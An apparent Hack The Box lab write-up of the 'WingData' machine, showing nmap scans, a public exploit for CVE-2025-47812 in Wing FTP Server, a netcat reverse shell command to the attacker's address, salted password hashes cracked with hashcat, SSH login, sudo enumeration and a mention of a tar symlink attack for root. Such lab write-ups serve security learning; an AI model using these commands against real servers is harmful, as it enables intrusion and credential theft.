July 13, 2026
HTB wingData LAB
HTB WingData

By UnStoppable
3 min read
as usual first thing to do is to scan open ports with nmap:
# you can set -p- option to scan all ports but for faster results i do this
nmap target_machine_ip# you can set -p- option to scan all ports but for faster results i do this
nmap target_machine_ip
scan it more to show service work behind this ports:
nmap -sC -sV 10.129.244.106nmap -sC -sV 10.129.244.106
and from here we discovered that service behind http is "Wing FTP server(Free Edition)
when open machine ip in browser and visit /login.html:
so go and search about "wingFTP vulnerabilities"
i find this article and it help me understand wingFtp vulnerability in this version:
https://censys.com/advisory/cve-2025-47812/
then go to exploit-db and get vulnerability poc to test:
OffSec's Exploit Database Archive Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE). CVE-2025-47812 . remote exploit for Multiple…
copy and save it in python file:
then run script with python to know the arguments:
python2 wingftp.pypython2 wingftp.py
after some false tries i found that the right way to test with this script is by specify the full url without login.html page in url and right the site url and not the ip.
so now i know it's vulnerable to this cve.
i tried with ls command by set -c option in command and that i know from help menu of poc script:
so know i need to take session instead of sending data by -c command so i want to send command that connect on my 8000 port and listen to this connection in my kali and wait for connection in new terminal.
nc -lnvp 8000nc -lnvp 8000
get my ip address in htb vpn:
ip addr show tun0ip addr show tun0
then send this command to get session on listening port.
python3 wingftp.py -u http://ftp.wingdata.htb -c 'nc 10.10.16.151 8000 -e /bin/bash/'python3 wingftp.py -u http://ftp.wingdata.htb -c 'nc 10.10.16.151 8000 -e /bin/bash/'and after connect read the exists files with:
ls -lahls -lahwe found a file called admins.xml so we read it:
cat admins.xmlcat admins.xmlwe find this line:
a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba
get hash and analyze it with hash identifier site:
https://hashes.com/en/tools/hash_identifier
it's SHA256 so i searched in google about default salt for wingftp:
and i found that it is: WingFTP
https://www.wftpserver.com/help/ftpserver/index.html?compression.htm
that's ok lets enter to user folder:
cd userscd usersshow files:
ls -lahls -lah
read all those .xml files and save it's hash in a file:
cat *.xml
a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba:WingFTP
32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTPcat *.xml
a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba:WingFTP
32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca:WingFTP
5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca:WingFTP
a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03:WingFTP
c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10:WingFTP
crack them with hashcat tool:
hashcat -a 0 -m 1410 winghash.txt /usr/share/wordlists/rockyou.txthashcat -a 0 -m 1410 winghash.txt /usr/share/wordlists/rockyou.txt
then we use this password to enter with ssh:
ssh wacky@ftp.wingdata.htbssh wacky@ftp.wingdata.htbafter got access use cat command to read user.txt file for user flag:
cat user.txtcat user.txtthen try to get root:
wacky@wingdata:~$ sudo -l
Matching Defaults entries for wacky on wingdata:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User wacky may run the following commands on wingdata:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *wacky@wingdata:~$ sudo -l
Matching Defaults entries for wacky on wingdata:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User wacky may run the following commands on wingdata:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *The script allowed us to restore client config from backup tarball.
wacky@wingdata:/opt/backup_clients$ sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -h
usage: restore_backup_clients.py [-h] -b BACKUP -r RESTORE_DIR
Restore client configuration from a validated backup tarball.
options:
-h, --help show this help message and exit
-b BACKUP, --backup BACKUP
Backup filename (must be in /home/wacky/backup_clients/ and match backup_<client_id>.tar, where <client_id> is a positive integer, e.g., backup_1001.tar)
-r RESTORE_DIR, --restore-dir RESTORE_DIR
Staging directory name for the restore operation. Must follow the format: restore_<client_user> (e.g., restore_john). Only alphanumeric characters and underscores are allowed in the <client_user> part (1–24 characters).
Example: sudo restore_backup_clients.py -b backup_1001.tar -r restore_johnwacky@wingdata:/opt/backup_clients$ sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -h
usage: restore_backup_clients.py [-h] -b BACKUP -r RESTORE_DIR
Restore client configuration from a validated backup tarball.
options:
-h, --help show this help message and exit
-b BACKUP, --backup BACKUP
Backup filename (must be in /home/wacky/backup_clients/ and match backup_<client_id>.tar, where <client_id> is a positive integer, e.g., backup_1001.tar)
-r RESTORE_DIR, --restore-dir RESTORE_DIR
Staging directory name for the restore operation. Must follow the format: restore_<client_user> (e.g., restore_john). Only alphanumeric characters and underscores are allowed in the <client_user> part (1–24 characters).
Example: sudo restore_backup_clients.py -b backup_1001.tar -r restore_johnthen search about Tar symlink overwrite attack and use one of github script that exploit this vulnerability and become root then read root file: